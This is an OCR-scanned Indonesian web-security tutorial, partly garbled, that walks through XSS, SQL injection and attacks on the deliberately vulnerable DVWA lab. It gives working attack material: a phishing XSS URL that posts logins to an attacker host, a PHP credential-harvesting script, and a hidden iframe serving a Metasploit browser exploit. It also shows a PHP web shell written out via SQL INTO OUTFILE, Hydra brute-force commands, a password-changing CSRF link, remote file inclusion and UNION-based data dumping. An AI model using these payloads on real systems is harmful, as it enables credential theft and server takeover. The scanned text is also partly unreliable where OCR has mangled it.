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Cross Site Scripting (XSS) 



Cross Site Scripting atau lebih dikenal dengan XSS adalah sa- 
lah satu jenis serangan terhadap web aplikasi dengan tipe in- 
jeksi, umumnya akan mengakibatkan kode-kode berbahaya da- 
pat disisipkan pada web asli dan resmi. 

Jenis serangan ini umumnya terjadi dikarenakan apikasi web 
tidak melakukan validasi dan encoding terhadap input yang dib- 
erikan oleh user dan langsung men-generate-nya kembali. 
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(Gambar Celah XSS pada situs Paypal) 

XSS dapat terjadi apabila: 
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1 . Data yang diinputkan ke web aplikasi dilakukan melalui sum- 
beryang tidak terpercaya, dan umumnya berupa requestke 
web aplikasi. 

2. Data di proses kedalam konten dinamik yang di kirim ke 
pengguna web tanpa terlebih dahulu di validasi. 



TIPE XSS 

Belum ada kesepeakatan berapa jumlah tipe/jenis XSS yang 
ada, tetapi pada umumnya terdapat beberapa tipe Cross Site 
Scipting yaitu: 

1 . Non-Persistent 

Tipe non-persistent atau lebih sering dikenal dengan tipe re- 
flected ini adalah yang paling banyak di temui, tipe ini akan me- 
nampilkan celah XSS sewaktu data diinput via browser, pada 
umumnya celah yang dieksploitasi merupakan paramater query 
HTTP atau HTML form submissions yang akan di proses oleh 
server-side dan ditampilkan kembali ke klien seperti pada gam- 
bar 1. 

Umumnya celah keamanan ini ditemukan pada halaman pen- 
carian, karena hasil dari pencarian akan di tampilkan kembali 
ke user, dan apabila response yang akan dikirimkan tidak se- 



cara benar melakukan parsing atau pembatasan terhadap tag 
HTML, maka akan terjadilah celah keamanan ini. 



Untuk memanfaatkan celah ini lebih lanjut, umumnya celah re- 
flected ini akan di kombinasikan dengan jenis serangan lain 
seperti phishing, dimana attacker akan mengirimkan email be- 
rupa alamat URL situs yang legitimate tetapi mengandung XSS 
payload yang akan di eksekusi oleh target. 

Berikut adalah contoh situs yang memiliki celah keamanan 
Cross Site Scripting (XSS) Reflected 
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Pada contoh diatas attacker melakukan ujicoba dengan me- 
masukkan "<h1>XSS</h1>" ke dalam input box untuk pen- 
carian, dan apabila ternyata memiliki celah keamanan XSS, 
maka akan menampilkan versi Header 1 untuk kata-kata "XSS" 
seperti berikut ini: 
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Seperti disinggung diatas, umumnya celah keamanan ini diman- 
faatkan untuk melakukan serangan phishing atau social engi- 
neering terhadap user/pengguna sah dari suatu situs, sebagai 
contoh adalah user akan di kirimi link untuk melakukan login, 
karena user hanya memeriksa nama domain dan tanpa me- 
meriksa keseluruhan link, atau attacker umumnya akan men- 
girimkan link yang sudah di perpendek dengan layanan "short 
i/r/'untuk memperbesar kemungkinan user menjadi percaya. 

Berikut adalah contoh payload XSS dalam serangan yang 
umumnya digunakan oleh attacker. Attacker akan mengirimkan 
link berikut ini: 

http://1 92.1 68.1 .209/omeqa-bank/result.php?teks=%3Cbr%3E%3Cbr% 

3EPIease+login+with+the+form+below+to%20get%20the%20result:%3 

Cform+action%3Dhttp://1 92.1 68.1 .21 0/qetloqin.php%3E%3Ctable%3E 

%3Ctr%3E%3Ctd%3ELogin:%3C/td%3E%3Ctd%3E%3Cinput+type%3 

Dtext+length%3D20+name%3Dlogin%3E%3C/td%3E%3C/tr%3E%3Ctr 

%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput+type%3Dt 

ext+lenqth%3D20+name%3Dpassword%3E%3C/td%3E%3C/tr%3E%3 

C/table%3E%3Cinput+type%3Dsubmit+value%3DLOGIN%3E%3C/for 

m%3E&password=&submit=Submit 

Atau apabila di perpendek dengan url-shortener menjadi 
http://bit.ly/result dan sebagainya, yang apabila di klik oleh user 
akan menjadi seperti gambar berikut ini: 
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Maka saat diakses user, dia akan di bawa ke web resmi, den- 
gan halaman yang menjadi berisikan halaman login (pada hala- 
man resmi pencarian), dibanding serangan web phishing den- 
gan fake sites, celah ini akan lebih valid dan juga bisa memby- 
pass situs yang mempergunakan SSL-based 

Kemudian, sesuai dengan payload yang dikirimkan, attacker te- 
lah membuat web yang akan mengambil seluruh login yang 
masuk nantinya. 

Berikut ini skrip sederhana yang bisa dipergunakan oleh at- 
tacker untuk mengambil informasi login dan password dari user, 



yaitu file getlogin.php yang dalam hal ini akan akan di simpan 
pada web yang beralamatdi http://192.168.L210 



<?php 

$login = $_GET['login']; 
$password = $_GET['password']; 
$fp = fopen("data.txt", "a"); 

fwrite($fp, "login: ".$login."l password :".$password. "\n"); 

fclose($fp); 

?> 



Seluruh informasi login user akan di simpan kedalam file 
data.txt, yang apabila ada user yang melakukan login, maka file 
data akan mulai terisi dengan format sebagai berikut: 



□ 192.168.1.210/data.txt 




login: tedi| password :qwerty 123 



Tetapi, dengan semakin meningkatnya keamanan browser 
maka dari sisi web browser sendiri melakukan filtering terhadap 
celah keamanan seperti ini, dalam hal ini cross domain policy. 
Selain hal diatas, attacker juga dapat melakukan hal lain, 

5 



seperti menyisipkan link yang apabila user mengklik link terse- 
but akan dibawa kehalaman yang memang sudah di persiap- 
kan sama persis seperti aslinya, tanpa melakukan cross- 
domain request. 

2. Persistent 

Tipe yang kedua adalah Persistent XSS, hal ini terjadi apabila 
data yang dimasukkan attacker akan disimpan oleh server dan 
secara permanen ditampilkan saat halaman web tersebut di 
buka. 

Celah keamanan yang banyak terjadi adalah pada halaman 
Buku Tamu dan juga forum diskusi. Berikut adalah contoh web 
dengan celah keamanan Cross Site Scripting (XSS) Persistent. 




Attacker menggunakan tag HTML "<b>" untuk mencetak tebal 
kata-kata yang dimasukkan pada buku tamu, dan akan disim- 
pan oleh server, saat ada pengguna lain yang mengakses buku 
tamu, maka dia akan mendapati pesan dengan teks tebal yang 
di tulis attacker. 

Umumnya, jenis serangan yang paling berbahaya dan meman- 
faatkan celah XSS tipe ini adalah attacker dapat menyisipkan 
link dalam tag <iframe> yang akan mengakibatkan user secara 
otomatis mengakses web yang telah di setup oleh attacker ber- 
isi kode untuk mengeksploitasi browser yang dipergunakan 
oleh user. 

Celah persistent XSS ini jauh lebih berbahaya bagi user dari su- 
atu situs web yang memiliki celah, karena pengguna yang men- 
gakses akan mengeksekusi XSS payload yang di render oleh 
server, sehingga seluruh user yang mengakses web tersebut 
akan rentan terkena serangan ini. 

Berikut adalah contoh skenario yang dilakukan oleh attacker un- 
tuk mengambil alih komputer target memanfaatkan celah XSS 
tipe persistent pada salah satu web dan memanfaatkan celah 
keamanan pada versi browser yang tidak terupdate. 

Pertama-tama attacker akan menghost browser exploit pada sa- 
lah satu situs, dalam hal ini http://1 92.1 68.1 .99 :8080/rOPBgX 
dan kemudian menuliskan ke dalam Buku tamu pada website 
yang bercelah dengan tag <iframe 
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src= http://1 92.1 68.1 .99:8080/rOPBqX width=0 height=0 ></ 
iframe> 

Cara termudah bagi attacker untuk mensetup web dengan 
browser exploit adalah menggunakan Metasploit, khususnya 
mempergunakan modul , browser_autopwn, tetapi hal ini akan 
mengakibatkan seluruh exploit di jalankan oleh Metasploit dan 
berakibat akan sangat kontra-produktif. 

Sehingga, untuk contoh berikut ini saya hanya mempergunakan 
1 exploit yang umumnya menyerang browser Internet Explorer 

msf > info exploit/windows/browser/ie_createobject 

Name: Internet Explorer COM CreateObject Code Execution 
Module: exploit/windows/browser/ie_createobject 
Version: 15188 
Platform: Windows 
Privileged: No 

License: Metasploit Framework License (BSD) 
Rank: Excellent 

Untuk menjalankan eksploitnya, attacker perlu melakukan set 
beberapa variabel, khususnya URIPATH /rOPBgX, dan selanjut- 
nya membiarkan metasploit menjalankan servernya dan 
menunggu target mengakses link <iframe> yang kita masuk- 
kan. 



Sedangkan disisi target adalah akan tampak kurang lebih 
seperti berikut ini: 

Victim akan mengakses link buku tamu (guestbook) dan tanpa 
sadar mengakses iframe yang di set tidak terlihat dengan size 
"0" untuk kemudian mengakses situs yang telah kita siapkan be- 
serta exploit untuk bwosernya. 



QT>IF 
BANK 

OMfGA 




Sedangkan disisi Attacker, maka akan mendapatkan koneksi 
dari target, dan proses eksploitasi browser pun berjalan. 
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Dan seperti yang telah kita lihat, attacker telah berhasil men- 
gambil alih komputer user/target yang mengakses web berisi 
buku tamu tersebut. :) 
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SQL Injection 



SQL injection adalah salah satu Attack vector yang sangat ser- 
ing dimanfaatkan oleh attacker untuk menyerang suatu web 
aplikasi khususnya pada layer database. 

Jenis serangan ini dilakukan dengan memasukkan perintah- 
perintah SQL kedalam "request/query" yang dilakukan ke 
aplikasi web dan akan diteruskan ke server database dengan 
perintah SQL yang telah di modifikasi. 

Kerentanan ini terjadi ketika semua input yang di masukkan 
oleh pengguna tidak di/irVtersecara baik. Umumnya serangan ini 
digunakan untuk merubah dan memodifikasi data didalam data- 
base atau untuk menampilkan (dump) isi dari database yang 
berisi informasi login user dan password atau data kartu kredit. 

1.1. Tipe Ancaman 

Dan berikut ini adalah tabel Tipe ancaman yang mungkin terjadi 
terhadap layer database dengan jenis serangan SQL injection 
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Tipe Ancaman 


Contoh SQL injection 


Spoofing 


Mengambil dan menggunakan informasi 
kredential user lain, memodifikasi value 
pesan yang dibuat oleh penulis sah. 


Tampering 


Memodifikasi dan merubah data di 
database 


Repudiation 


Menghapus event log database, 
menghapus transaction records 


Information 
Disclosure 


Mendapatkan informasi kartu kredit, dan 
mendapatkan gambaran secara internal 
dari suatu aplikasi 


Denial Of Service 


Menjalankan perintah SQL yang 
menghabiskan sumber daya. 


Elevation of Privilige 


Menjalankan perintah shell, melakukan 
teknik privileges escalation untuk 
mendapatkan credentials yang 
menjalankan mysql (root/administrator) 



(Tabel 1 , Jenis Tipe ancaman dan contoh SQL Injection) 



Implementasi Teknis 



Berikut ini adalah beberapa implementasi secara teknis jenis 
serangan SQL Injection yang umum terjadi pada web aplikasi. 

1. Incorrectly filtered escape characters 

Tipe SQL Injection ini terjadi apabila pada tempat form input ti- 
dak terdapat filter yang akan melakukan pemeriksaan terhadap 
karakter-karakter yang seharusnya tidak boleh dipergunakan 
(escape characters) dan yang dimasukkan pengguna. 

Escape characters, salah satu contohnya ' (single quote) ini 
juga umumnya yang dipergunakan oleh attacker untuk mende- 
teksi apakah suatu web aplikasi memiliki celah SQL Injection, 
sebagai contoh memasukkan karakter single quote ke input us- 
ername akan menampilkan error sebagai berikut: 




Dengan adanya error, mengindikasikan bahwa web aplikasi 
memiliki celah SQL Injection dikarenakan tidak melakukan filter 
terhadapescape characters. 
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Serangan terjadi umumnya pada form yang membutuhkan inpu- 
tan dari user, sebagai contoh form untuk login. Attacker 
umumnya memasukkan karakter yang akan di proses oleh SQL 
Server, contoh yang sudah sangat umum adalah membypass 
login dengan memanfaatkan perintah SQL. 




Perintah SQL yang umumnya dipergunakan untuk membypass 
login adalah dengan memasukkan inputan untuk username 
yaitu ' or '1 ' = '1 . Sehingga untuk statement SQL "SELECT * 



FROM users WHERE name = 111 + username + "'; , dan yang 
akan terkirim ke database server adalah : SELECT * FROM us- 
ers WHERE name = " OR '1 '='1 '; 

Dan apabila tidak ada filter terhadap escape charater, maka 
SQL akan mengijinkan attacker untuk bisa login ke halaman 
user, seperti gambar berikut ini: 

2. Incorrect Type Handling 
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Tipe yang kedua adalah incorrect type handling, celah kea- 
manan ini terjadi karena kesalahan aplikasi dalam mendefinisi- 
kan tipe, atau tidak adanya batasan tipe yang dimasukkan. Se- 
bagai contoh dibawah ini, seharusnya developer memasukkan 
tipe numeric sehingga inputan selain numeric akan di tolak dan 
tidak akan terjadi. 
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Seperti biasa, untuk melakukan pemeriksaan kemungkinan ce- 
lah sql injection bisa juga dilakukan dengan menggunakan es- 
cape characters yang dalam hal ini adalah ' (single-quote) yang 
merupakan flase argument, dan kita mengharapkan error. 
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# Our Story 



Kemudian, pada gambar sebelumnya kita memasukkan perin- 
tah SQL "desc user" untuk di teruskan oleh aplikasi ke data- 
base, dan ternyata table user tidak tersedia didalam database 
"omega" dan kita mendapatkan nama databasenya. 

selanjutnya, berdasarkan hasil pertama percobaan , kita menge- 
tahui bahwa semua perintah SQL akan di lanjutkan oleh web 
aplikasi ke database server. Sehingga, salah satu serangan 
yang cukup bermanfaat dan bisa kita lakukan selain melakukan 
dump data-data di database adalah memanfaatkan perintah 
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menulis ke file dengan fungsi INTO OUTFILE untuk mendapat- 
kan akses ke-shell. 

Adapun langkah yang kita tempuh adalah dengan membuat se- 
buah tabel mysql yang akan kita isikan payload backdoor php 
dan natinya akan kita tulisi ke file php. 

1 . Langkah pertama adalah membuat tabel dengan perintah: 
create table foo(doo text) 




2. Selanjutnya adalah memasukkan payload ke dalam tabel 
DOO 



insert into foo(doo) values ('<?php system($_RE- 
QUEST["cmd"]); ?>'); 
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3.Kemudian kita tulis ke file dengan fungsi INSERT INTO ke da- 
lam file yang terdapat didalam direktori web, 

select * into outfile 7var/www/omega-bank/upload/bobi.php' 
from foo; 
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4. Selanjutnya untuk mengakses backdoor, kita bisa mengak- 
sesnya di URL backdoor tersebut kita tulisi, yaitu: 



http://1 92.168.1.209/omega-bank/upload/bobi.php?cmd=id 



19?. 164. 1 .?09/om«»*-tMnk/iiele*d/bobi php.*i»wd- id 




Selanjutnya anda bisa mendownload backdoor yang lebih kom- 
plek lagi seperti backdoor metasploit meterpreter, dan kemu- 
dian menjalankan local exploit untuk menjadi root/administrator, 
atau kegiatan untuk escalating privileges lainnya yang mungkin 
dapat anda lakukan. 
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DVWA 

DVWA atau Damn Vulnerable Web Application adalah 
aplikasi web yang sengaja dibuat dan memiliki celah keamanan 
dengan bahasa pemrograman PHP dan database engine 
MySQL. 



****** «*» A** 



DyWAj 



Welcome to Damn Vulnerable Web App! 



•••it 



WARNING? 

0**> **i w m i*t> + m** 0*^*^**r>j*»^ ****** +MM*wi+mr* 



General 
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Tujuannya dibuatnya DVWA adalah sebagai "bantuan" untuk 
para profesional keamanan dalam menguji keterampilan 
mereka, membantu pengembang web lebih memahami proses 
untuk dapat mengamankan aplikasi web dan bantuan untuk 
mempelajari keamanan aplikasi web. 

DVWA sendiri dapat di dowload di http://dvwa.co.uk dalam ben- 
tuk web aplikasi atau file ISO. 

Pada aplikasi DVWA terdapat beberapa celah keamanan yang 
dapat kita coba untuk di pelajari, diantaranya: 

1 . Http-form-based bruteforce 

2. Command Execution 

3. CSRF (Cross site Request Forgery) 

4. File Inclusion 

5. SQL Injection 

6. Blind SQL Injection 

7. Upload 

8. XSS Reflected 

9. XSS Persistent 

Sebagai peringatan, jangan install aplikasi ini pada server 
production anda. Sebisa mungkin digunakan pada kom- 
puter yang terisolasi, sebaiknya gunakan ISO file saja. 



Selain dilengkapi dengan celah-celah keamanan, aplikasiini 
juga dilengkapi dengan aplikasi IDS berbasis php, kemudian 
juga di lengkapi bantuan terkait celah keamanan pada pojok 
bagian bawah terdapat tombol veiw source dan view help. 




Selain itu juga terdapat level security untuk DVWA, untuk dapat 
di eksploitasi dengan mudah maka gunakan setting Low pada 
DVWA Security. 

DVWA Security • 
Script Security 
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>i —» lfc M J — — i nu mmUMit 





HI 


CW 














«V3 »»,-t J 





w \ 



am *MM ^ P ummm Ommm tyn) • • 

PIMM* «Mfcfc* KM 

(Imuttte in>c«J * Cf tool 



17 



Untuk pembelajaran awal, gunakan setting Low pada level 
DVWA Security. Dan selanjutnya kita akan membahas satu per- 
satu cara untuk melakukan eksplotasi terhadap aplikasi DVWA 
ini. 
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Vulnerability Exploitation 



Seperti yang sudah sedikit disinggung diatas untuk memulai me- 
lakukan eksploitasi terhadap tiap-tiap celah yang terdapat pada 
dvwa, maka kita harus melakukan setting level DVWA security, 
untuk tahap awal kita bisa men-set-nya menjadi Low, dan kemu- 
dian mencoba mengeksploitasi tiap-tiap celah keamanan. 

1 . Http-form-based bruteforce 

Celah pertama yang tersedia dan dapat kita coba untuk eksploi- 
tasi adalah celah Bruteforce, umumnya celah ini terdapat pada 
login form untuk yang form-based atau pada login http-auth, da- 
lam hal ini celah keamanan bruteforce yang terdapat pada 
DVWA adalah http-form-based. 
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Celah bruteforce itu sendiri bisa dieksploitasi secara manual 
atau mempergunakan tools, biasanya untuk melakukan brute- 
force akan lebih efektif menggunakan dictionary yang meru- 
pakan kumpulan kata-kata yang umumnya dipergunakan seba- 
gai password atau merupakan kumpulan default password 
yang sudah umum di pergunakan. 



Adapun tools-tools untuk melakukan bruteforce terhadap http- 
form-based adalah diantaranya: 

1 . Nmap NSE (http-form-brute) 

2. THC Hydra 

3. Brutus 

4. Acunetix 

5. Burp suite 

Dan selain tools diatas, masih banyak lagi yang mungkin dapat 
dipergunakan, dalam hal ini kita tidak akan mencobakan se- 
muanya. Kali ini kita akan mempergunakan THC Hydra untuk 
membruteforce login, sebelum itu kita harus mempersiapkan 
dictionary untuk username dan password. 



DareDevil:hydra-7.4.2 ammar$ cat > user «EOF 

> root 
>foo 

> admin 

> administrator 
>EOF 

DareDevil:hydra-7.4.2 ammar$ cat > password « EOF 
> 12345 

> qwerty 

> password 

> secret 

> password 123 
>EOF 
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Selanjutnya kita memerlukan beberapa variabel yang nantinya 
akan kita masukkan sebagai opsi pada thc-hydra, dan (error) 
response yang ada. 



Untuk mendapatkan error response, coba login terlabih dahulu 
dengan password sembarang, dalam hal ini kita coba dengan 
admin :admin dan mendapatkan error "Username and/or pass- 
word incorrect." 
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Vulnerability: Bruto Forct 



Mora Info 





Selanjutnya jalankan hydra untuk melihat opsi yang di miliki. 
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dan kita akan memanfaatkan opsi service: http[s]-{getlpost}- 
form. Untuk melakukan bruteforce kita memerlukan beberapa 
variabel, yaitu variabel untuk HTTP-method, username, pass- 
word dan submit, hal itu bisa kita dapatkan dengan melihat 
source dari halaman login tersebut atau menggunakan local 
proxy seperti burp atau tamper-data add-ons di firefox. 
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Kemudian, kita bisa menjalankan aplikasi hydra dengan opsi- 
opsi sebagai berikut: 

./hydra -I admin -P password 192.168.1.206 http-get-form 
"/vulnerabilities/brute/index. php:username= A USER A &pass 
word= A PASS A &Login=Login:Username and/or password 
incorrect. :H=Cookie: PHPSES- 
SID=0p61ua4p0u4g28bfk36qcr11c1 ; security=high" 

yang hasilnya akan seperti berikut ini apabila berhasil: 



0ir»0t»1l »ydri-J 4 ) aaaarf /ftydra -I ad»1n -t pa«%»cr* ItJ US 1 ht I p- 1« t - f orm ' /vul n*r»H I \ \ 1 a%/*r« 
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t«/tnd»« a«# Mttrftt**« A USit A 4a*«%wora»*f>ASS A *io|l*«lot1a.9t«faaM a*d/ae password mtorrtd K*»i'i fNfVf 
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•ydre at .4.3 (c)*dW ay va« Bavaar/TNC » Oavid ftac'ejafc - far legal e*rpo%es **iy 

•ydra (*tta //»r*w.ta< erg/tar.. aydra) starting at 2dl) dlld W H O 
(OAT AJ S ttglf. 1 lirvtr, S tagm trial (I t/p S), -1 try per test 
(DATA] attacking service Mtp-get -for. ci port M 

|M| («vw 'er«.) Hast 192 HI 1 2dd Ipjgfaai adrna patawara password 

1 af 1 targat successfully caasaleted. 1 valid pesswo'd f aa ad 
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Dan didapatkan username=admin dan password=password. 

Sehingga apabila kita coba gunakan untuk login, maka kita 
akan berhasil masuk menggunakan credentials admin. 
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Selanjutnya kita coba pada situs lain, sebagai contoh aplikasi 
berikut ini: 




dan dengan mempergunakan thc-hydra maka akan berhasil di 
bruteforce juga, seperti berikut ini: 

#hydra -L user -P password 192.168.1.210 http-post-form 
7omega-bank/check.php:username= A USER A &password= A 
PASS A &Submit=Submit:Not Register or Wrong Password" 
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DareDevil:bruteforcer aaaarf cd hydra-7.42 

OareDevi I : hydra- 7 . 4. 2 aaaarf hydra -I adain -P password 192.160.1.216 http-post -fora Voaefa 
•nk/check.phpju^trhw^USC^aoassMord-^ASS^aSobai t»Subai t :Not Register or Wrong Password" 
Hydra v7 4,2 (c)2812 by van Mauser /TKC & David Hadejafc ■ for lefal purposes only 

Hydra (http://vw.ttiC.orc/thc hydra) starting at 2613 61 14 28:65:32 
(DATA) S tasks, 1 server, $ lofin tries (l:l/p:5). -1 try per task 
(DATA) attacking service http-post -fora on port 88 

|88]|wv-for*] host: 192 168 1.218 login; adain password: password 

1 of 1 target successfully coapleted. 1 valid password found 

Hydra (http //*** . the org/ the -hydra) finished at 2813*61*14 26:65:33 

DareDevi 1 :hydra-7 .4. 2 aaaarf hydra -L user -P password 192.166.1 216 http-post-fora •/oaegs- 
nk/check.pnp:usernaae» A U$eR A *password« A PA$$ A a5ufeai t-Subal t Wot Register or Vrong Password* 
Hydra v7.4.2 (c)2812 by van Hauser/THC & David Hade) a* - for legal purposes only 

Hydra (http://www.thc. org/ thchydra) starting at 2813 61 14 26:65:S4 
| DATA ) 16 tasvs. 1 server. 26 login tries (l:4/p $), -1 try per task 
| DATA | attacking service http-post-fora on port 86 

|66]|t#wv-fora] host: 192 168 1.218 login: adain password: password 
1 of 1 target successfully coapleted. 1 valid password found 
Hydra (http://www.thc.org/thc-hydra) finished at 2813 81 14 26:85:55 
DareDevil:hydra-7,4.2 aaaarf 



2. Command Injection 

Celah yang kedua adalah celah command injection, dengan 
adanya celah ini memungkinkan attacker untuk memasukkan 
perintah (command) via web aplikasi dan akan diteruskan dan 
dijalankan oleh sistem operasi dengan privilege user web 
aplikasi. 



«■ 192 )*f 1 20a,*«u*«n 



Vukwo* WH> App ODVWA) vl 0 7 VulnftakMky Irvt* *<*t* 

ft A.. » 

O O # # C 4-Co*a* 



Vulnerability: Command Execution 



Ping f<x FREE 



b^i-f rrfinan ninai f m fur iirr 



Pada DVWAterdapat aplikasi yang mengijinkan kita untuk me- 
manfaatkan fasilitas PING suatu ip/web melalui aplikasi, seba- 
gai contoh berikut ini kita melakukan ping terhadap yahoo.com. 
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Vulnerability Command Execution 
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Dan oleh aplikasi perintah ping kita akan di teruskan ke sistem 
operasi, yang menjadi permasalahan adalah apabila tidak terda- 
pat filter, sehingga untuk mengeksploitasinya kita dapat me- 
masukkan perintah (command) milik sistem operasi. 
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Vulnerability: Command Execution 
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info 



Dalam hal ini kita mempergunakan separator untuk men- 
jalankan beberapa perintah pada sistem operasi seperti ";" atau 
"&". 

Dan ternyata, seluruh perintah yang kita masukkan akan langs- 
ung diteruskan oleh aplikasi ke sistem, dan salah satu seran- 
gan yang mungkin kita lakukan adalah mendownload (misal 
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menggunakan wget) dan menjalankan backdoor (menjalankan 
netcat atau backdoor yang telah di download). 

3. Cross Site Request Forgery (CSRF) 

Celah ketiga yang terdapat pada DVWA adalah CSRF yang 
merupakan kependekan dari Cross Site Request Forgery, yang 
merupakan salah satu jenis serangan yang memaksa target un- 
tuk mengeksekusi aksi yang tidak di harapkan dari suatu web 
aplikasi saat mereka sedang terotentikasi ke web tersebut. 

Celah ini umumnya dikombinasikan dengan celah sosial engi- 
neering. Beberapa fitur yang umumnya dijadikan sasaran ada- 
lah fitur penggantian password, perubahan profile dsb. 

Pada aplikasi dvwa terdapat form untuk merubah password dan 
ternyata memiliki celah CSRF, 

Cara untuk mengeksploitasinya adalah memberikan link berikut 
ini ke target, baik via email/forum dsb-nya (khususnya yang me- 
nampilkan html) 

<a 

h ref=" http://1 92.1 68.1 .208/vulnerabilities/csrf/?password new= 
qwerty&password conf=qwerty&Change=Change# ">Click 
Here</a> 



Vulnerability: Cross Site Request Forgery (CSRF) 




Sehingga, setiap user yang mengklik link - Click Here - maka 
passwordnya akan terganti menjadi "qwerty". 

4. File Inclusion 

Celah keempat yang terdapat pada DVWA adalah File Inclu- 
sion, sehingga memungkinkan attacker untuk meng-include- 
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kan file ke aplikasi, umumnya celah ini terbagi dua, local file in- 
clusion dan remote file inclusion dan celah ini akan semakin ber- 
bahaya jika kode yang terdapat pada halaman yang di include 
di eksekusi oleh aplikasi atau memiliki juga celah code 
execution. 



• OH Damn Vulnerable Web App ODVWA) vl.0.7 :: Vulnerability Tile Inclwwon ■ 

i ■* v i 1^ S 19M6B.1.20B C J O 



Vulnerability: File Inclusion 








,TT.*W.j tt c r 









Untuk celah local file inclusion kita bisa mencoba untuk meng- 
include file yang terdapat di server dan dapat dibaca oleh user 
web, dengan memanfaatkan path traversal. 




Sebagai contoh kita membaca file 7etc/passwd", yang apabila 
berhasil maka akan muncul file /etc/passwd yang dapat kita 
baca. 

Sedang untuk mencoba apakah suatu web aplikasi memiliki ce- 
lah remote file inclusion, kita dapat meng-include-kan situs lain 
ke aplikasi web tersebut, dalam hal ini dvwa, sebagai contoh si- 
tus http://yahoo.com 
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Dan ternyata, aplikasi DVWA memiliki celah remote dan /oca/ 
///e inclusion. Selanjutnya kita akan mencoba meng-include-kan 
web dengan halaman php, dalam hal ini berisi fungsi phpinfo(); 
yang apabila di eksekusi berarti aplikasi mengijinkan remote file 
inclusion dan remote code execution. 

Selanjutnya kita akan mengeksploitasinya dengan skrip phpinfo 
sederhana dan disimpan dengan nama phpinfo.txt di webserver 
lain yang sudha kita persiapkan. 



192.168.1.203/phpinfo.txt 



<?php 
phpinfo ( ) i 
?> 



Dan selanjutnya kita coba meng-include-kan pada aplikasi 
DVWA yang bercelah remote file inclusion, apakah skrip terse- 
but akan dijalankan dan dieksekusi oleh php di server DVWA 




Dan ternyata, script tersebut di eksekusi oleh aplikasi DVWA. 
Selanjutnya kita bisa membuat script php yang berisi web shell 
dan kita include-kan ke halaman dvwa yang bercelah. 
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sit 



^ | C 1 



dvwa; 



Kitapun telah bisa berinteraksi dengan sistem melalui script php 
web shell yang mengeksploitasi celah keamanan remote file in- 
clusion dan remote code execution. 

5. SQL Injection 

Celah kelima yang terdapat pada DVWA adalah celah SQL In- 
jection. Untuk mengeksploitasinya kita bisa melakukan secara 
manual atau dapat mempergunakan tools scanner untuk mene- 
mukan celahnya, dan juga untuk mengeksploitasinya. Tools 
yang sangat umum dipergunakan salah satunya sqlmap. 




*• l92.K>S.liX)S.>n.ir«raMIMM/i4VM>M5ubnM-SubMt 



Q. A * 



Vulnerability: SQL Injection 




Mora info 



Untuk melakukan eksploitasi secara manual terhadap celah sql 
injection biasa, kita dapat mempergunakan string/numeric true 
(", " ",\\, and 1) dan false (', ", \, and 0) , maka umumnya yang 
dilakukan adalah dengan memanfaatkan error dan mempergu- 
nakan escape character seperti single quote (') agar hasil false 
dan mendapatkan error. 



0 Oam^ Vuln«r*6l« Wes 
-> 192.168. 1. 208,' vulnerabilities/ 



• C *| 



Vulnerability: SQL Injection 




User ID: 



More info 
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dan menghasilkan error sql, seperti berikut ini: 



atau untuk login kita bisa menggunakan perintah 1 ' OR "=' 
yang berarti True dan hasil akan ditampilkan. Agar Query kita 
diproses dan tidak ada query lagis etelahnya di proses, kita 
bisa menggunakan comment out query pada akhir sql state- 
ment yang kita gunakan diantaranya #, /*, -- -. 



Vulnerability: SQL Injection 



rci i« ob •-• 
rmt uai tmm 



info 



Sekarang apabila kita bypass dengan semua true, tanpa ID 




Dan untuk mencari jumlah column yang terdapat di tabel dari 
database yang bisa kita pergunakan, kita bisa melakukannya 
dengan cara mengaksesnya 1 persatu sampai tidak menjadi er- 
ror, untuk asumsi 1 column, gunakan 'union select 1# 



Vulnerability: SQL Injection 



User ID: 



'urior select 1# 



Suomit 
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dan apabila masih terdapat error seperti ini: 



192.168.1.208/ vulnerabihties/sqli/. 'id =9fc^ /union -hsele 



i.-.e -sad BBLBC9 ttatowiiti htfi a uftevrat niiBbax dI doIubai 



kemudian di coba lagi dengan 2 column, 



User ID: 



] 1 Subwt 

XOi 'union select 1,2# 
First noei 1 
Surname i 2 



dan ternyata tidak error lagi dan kita ketahui bahwa ada 2 col- 
umn, jika masih error dapat dilanjutkan sampai tidak ada error. 

Setelah kita mendapatkan jumlah column yang di tampilkan, se- 
lanjutnya untuk setiap query kita bisa memanfaatkan 2 kolom 
tersebut, sebagai contoh kita hanya mempergunakan kolom ke- 
dua 



Vulnerability: SQL Injection 

Ut*r ID: 



UHK>4 S£LECT 1 QQ> 
20* UII10« MLCC? | f MmilM* 
t'irr.iMi ». l.Sf-lufcoatul 



selanjutnya yang mungkin dilakukan adalah berinteraksi den- 
gan database, sehingga kita dapat melihat seluruh isi data-data 
di database, seperti berikut: 



Vulnerability: SQL Injection 

9mm 
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Mora info 



Dari info diatas kita mengetahui nama database dari dvwa yaitu 
'dvwa', dan untuk mengetahui nama tabel, jika mysql ver 4 kita 
harus melakukan bruteforce, atau jika itu berupa opensource 
cms kita bisa melihatnya, sedangkan untuk mysql versi 5 kita 
bisa mempergunakan table information_schema yang memberi- 
kan informasi terkait data-data yang terdapt didalam database 
seperti nama database dan nama tabel, tupe data dan kolom 
atau akses privilege. 

Seperti contoh berikut ini adalah mengakses tabel informa- 
tion schema. 
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Vulnerability: SQL Injection 
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flit* 



• 11 MlMt t«bl« 

.nun 



• 11 NllCt t«M« 

*A>t«*Lftf 
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f ro» lM«i»«tioi »cfc 



ttbJ«»* 



fro* .Mf«c*«tio» 



fro* &*rf*r»«taor 



fro* i**«ro«tioi »c* 



atau hanya melihat informasi nama tabel dari database yang 
kita gunakan saja menggunakan perintah sql sebagai berikut 

1 union all select table_name,database() from 
information schema. tables where table_schema=dat- 
abase()# 



yang hasilnya adalah sebagai berikut: 



Vulnerability: SQL Injection 



User ID: 



!»• 1 MiM #11 t«l*ri t«»2o 

fl*oi MMi r***t»*Ot 

Wmmm 



fUlt ■■■■» MM* 

Iuirami dm 



»,o*t •*•*•< | frta i*lor**tioA 



,:»tiui» i froa l*form*tl«* 



t*bl*» 



wiMrt t*bl» •ch*a*-d*tAb*a« t i# 



Setelah kita dapatkan nama database (dvwa), kemudian nama 
tabel dan jumlah kolom, selanjutnya kita perlu mencari nama 
kolomnya, dengan kembali memanfaatkan tabel 
information_schema.column denagn perintah berikut: 

1 union all select column name, database() from 
information schema. columnss where table_schema=dat- 
abase()# 
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Vulnerability: SQL Injection 



UssrIO: 



XDi ' union oil ••loci colu 
. ¥ :nl nooo i coiMnt id 
IttlUMl 1 

XDi ' onion oil ooloct colu 
fixat nooot coostnt 
Suxoosoi 1 

20i ' onion oil ooloci colu 
NlM nooot 2.090 

